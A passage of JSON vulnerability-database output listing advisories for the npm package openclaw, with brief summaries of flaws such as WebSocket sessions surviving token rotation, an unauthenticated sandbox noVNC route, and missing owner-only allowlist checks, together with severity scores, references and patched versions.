"VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-8z7r-a8dv-eueb" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-jtxm-z4vv-cqg7" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v1bp-hw9a-yffz" }, { "vulnerability": "VCID-v91b-1nmx-ckcx" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wut7-y72y-9ucb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22" } ], "aliases": [ "GHSA-g8mc-c5f2-mqg7" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nszj-2u6y-xqcb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89492?format=api", "vulnerability_id": "VCID-ntwt-jkgr-sffu", "summary": "OpenClaw: Existing WS sessions survive shared gateway token rotation\n## Impact\n\nExisting WS sessions survive shared gateway token rotation.\n\nRotating the shared gateway token did not disconnect existing shared-token WebSocket sessions.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @kexinoh of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42421", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10417", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10395", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10436", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42421" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5h3f-885m-v22w", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:15:14Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5h3f-885m-v22w" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42421", "reference_id": "CVE-2026-42421", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42421" }, { "reference_url": "https://github.com/advisories/GHSA-5h3f-885m-v22w", "reference_id": "GHSA-5h3f-885m-v22w", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5h3f-885m-v22w" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-websocket-session-persistence-via-shared-gateway-token-rotation", "reference_id": "openclaw-websocket-session-persistence-via-shared-gateway-token-rotation", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:15:14Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-websocket-session-persistence-via-shared-gateway-token-rotation" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api", "purl": "pkg:npm/openclaw@2026.4.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2g7x-vu14-nkde" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dqb2-dej7-augt" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-wyat-1259-2kg9" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8" } ], "aliases": [ "CVE-2026-42421", "GHSA-5h3f-885m-v22w" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ntwt-jkgr-sffu" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89684?format=api", "vulnerability_id": "VCID-nv6g-7gs9-pfan", "summary": "OpenClaw: Sandbox noVNC helper route exposed interactive browser session credentials\n## Summary\n\nSandbox noVNC helper route exposed interactive browser session credentials.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `>= 2026.2.21 < 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nThe sandbox noVNC helper route could be reached without the intended bridge authentication, exposing an interactive browser session surface.\n\n## Technical Details\n\nThe fix gates the sandbox noVNC helper route behind bridge authentication.\n\n## Fix\n\nThe issue was fixed in #63882. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `8dfbf3268bd224b7377d1ecca77a445100746085`\n- PR: #63882\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/8dfbf3268bd224b7377d1ecca77a445100746085", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/8dfbf3268bd224b7377d1ecca77a445100746085" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/63882", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/pull/63882" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-92jp-89mq-4374", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-92jp-89mq-4374" }, { "reference_url": "https://github.com/advisories/GHSA-92jp-89mq-4374", "reference_id": "GHSA-92jp-89mq-4374", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-92jp-89mq-4374" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109896?format=api", "purl": "pkg:npm/openclaw@2026.4.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6cfj-zugb-7uhq" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hphn-8fnj-qkh2" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-q3a2-qk5j-1yat" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10" } ], "aliases": [ "GHSA-92jp-89mq-4374" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nv6g-7gs9-pfan" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89754?format=api", "vulnerability_id": "VCID-nw4r-wjgs-8qc1", "summary": "OpenClaw: /allowlist omits owner-only enforcement for cross-channel allowlist writes\n## Impact\n\n/allowlist omits owner-only enforcement for cross-channel allowlist writes.\n\nAn authorized non-owner sender could attempt allowlist writes against a different channel.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<=v2026.4.1`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @zsxsoft and @KeenSecurityLab for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41910", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.2513", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25179", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25193", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41910" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" }, { "value": "4.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "4.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", 